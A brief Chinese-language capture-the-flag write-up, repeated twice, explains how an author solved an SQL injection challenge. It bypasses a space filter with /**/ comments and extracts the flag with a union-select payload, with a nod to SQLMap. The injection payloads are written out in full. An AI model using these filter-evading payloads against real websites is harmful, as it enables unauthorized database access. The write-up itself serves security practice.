直接打开解题连接:
既然是SQL注入,那么我们就要构造注入语句了,这个就要有耐心一个一个去尝试了
输入语句
1'and 1=1 #
和
1'and/**/1=1/**/#后
对比一下,发现是过滤掉了空格,我们用/**/代替空格
下面就要构造找flag的语句了
1'/**/union/**/select/**/flag/**/from/**/flag#
最后就能找到flag了,(其实这里面还有一些步骤,用SQLMap跑啊跑~)
2023-02-25 15:16:20
直接打开解题连接:
既然是SQL注入,那么我们就要构造注入语句了,这个就要有耐心一个一个去尝试了
输入语句
1'and 1=1 #
和
1'and/**/1=1/**/#后
对比一下,发现是过滤掉了空格,我们用/**/代替空格
下面就要构造找flag的语句了
1'/**/union/**/select/**/flag/**/from/**/flag#
最后就能找到flag了,(其实这里面还有一些步骤,用SQLMap跑啊跑~)